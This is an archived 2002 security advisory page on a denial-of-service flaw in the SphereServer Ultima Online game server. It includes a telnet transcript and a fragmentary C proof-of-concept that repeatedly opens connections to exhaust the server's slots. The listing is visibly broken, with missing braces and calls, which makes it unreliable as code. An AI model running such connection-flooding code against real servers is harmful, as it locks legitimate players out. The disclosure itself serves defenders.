Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Game)  >   SPHERE Vendors:   Menasoft
SPHERE Server Gaming Server Lets Remote Users Consume All Available Connections on the Server, Blocking Other Users
SecurityTracker Alert ID:  1003721
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 3 2002
Impact:   Denial of service via network

Version(s): 0.5x
Description:   H Zero Seven issued a security advisory warning of a denial of service vulnerability in the SPHERE server. A remote user can consume all available connections on the server, preventing other users from accessing the server.

It is reported that there is no limitation on the number of connections from a single IP address within any particular period of time. A remote user can hold a connection open without supplying an authentication information. If this is performed multiple times, the remote user can cause the server to reach the maximum connection count, thereby blocking other users.

A demonstration exploit transcript and a demonstration exploit script are provided in the Source Message.

The vendor has reportedly been notified.

Impact:   A remote user can readily cause the server to reach its connection limit, blocking other users from accessing the server.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Denial of Service in Sphereserver

 H Zero Seven Security Advisory [15.02.2002]

 SphereServer Denial of Service Vulnerability



 The SphereServer is an Ultima Online Roleplay Server
 (Multiplayer). Some people use this inofficial Server
 to host Free Roleplay Worlds for an large community of
 Players. The Developer of the Software is MenaSoft
 ( Thus no ip-limitation exists in 
 the configuration so anyone can connect several times.
 The Problem is that an client can hold the connection
 without user-identification. So its possible to reach
 the maximum connection count and block other users.

 Affected Systems:

 Sphere99x - Linux, FreeBSD, Win32

 Possible affected:

 Sphere 0.5x


The SphereServer user-auth is very simple and you can authenticate with telnet too. 

 linentw:~ # telnet target 2593
 Trying target...
 Connected to target.
 Escape character is '^]'.

 [so at this point the sphereserver count you as an client]:
 90:Client connected [Total:1] from ''.

 [now send an space and the sphereserver ask for the username]
 Username: _

 [type username return and the password]

cc:Login 'validusername'   <-- loged in and with the client you can play :)
 So the problem is that the server count you as an client still you
 connect and sent nothing to it. And do this several times until the
 max_connections reached, so the server blocks all new connections.

 linentw:~ # telnet target 2593
 Trying target...
 Connected to target.
 Escape character is '^]'.
 Maximum connections reached, please try it later
 Connection closed by foreign host. 
There is no true time_out variable in the configuration file and the death_socket function does not work correctly in sphere. The
 Vendor has been informed about this, but no answer.


 no true fix available, but set the death_socket variable in the configuration to 3 should help for the first time, even it does not
 work correctly (its like an dice-game).


This advisory does not claim to be complete. The informations may be inaccurate or wrong. Possible exploit code is only written for
 testing purposes. Articles based on informations in this advisory should have an link to this document.


 * H Zero Seven 
 * Unix Security Research Team
 * Sphere Ultima Online Server - Denial of Service Vulnerability
 * poc-exploit...
 * Simple code to eat all connections from the gameserver, so other
 * peoples could not connect to the server.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

int Connect(int ip, int port)
   int fd;
   struct sockaddr_in tgt;
   if (fd<0) return -1;
   memset(&tgt,0,sizeof(struct sockaddr_in));
   tgt.sin_port = htons(port);
   tgt.sin_family = AF_INET;
   tgt.sin_addr.s_addr = ip;
   if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1;
   return fd;

int sprint(int fd, const char *str,...)
   va_list args;
   char buf[4096];

int main(int argc, char *argv[])
   int fd;
   struct sockaddr_in box;
   fprintf(stderr, "SphereServer DoS Exploit [poc]\n");
   fprintf(stderr, "H Zero Seven - Unix Security Research Team -\n\n");
   if (argc < 2) {
      fprintf(stderr, "usage: %s <sphere ip> [sphere port]\n",argv[0]);
   fprintf(stderr,"for the full advisory regarding this vulnerability visit ... \n");
   if (fd<0) {
      perror("socket() ");

   fprintf(stderr,"Attacking sphere : ");
   for (;;) {
      int sock;
      sock = Connect(inet_addr(argv[1]),(argc>2)?(atoi(argv[2])):3128);
      if (sock<0) {
       fprintf(stderr, ".*");


 H Zero Seven - Unix/Linux Developer Team
Sprach-, Fax- und Mailnachrichten unter


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC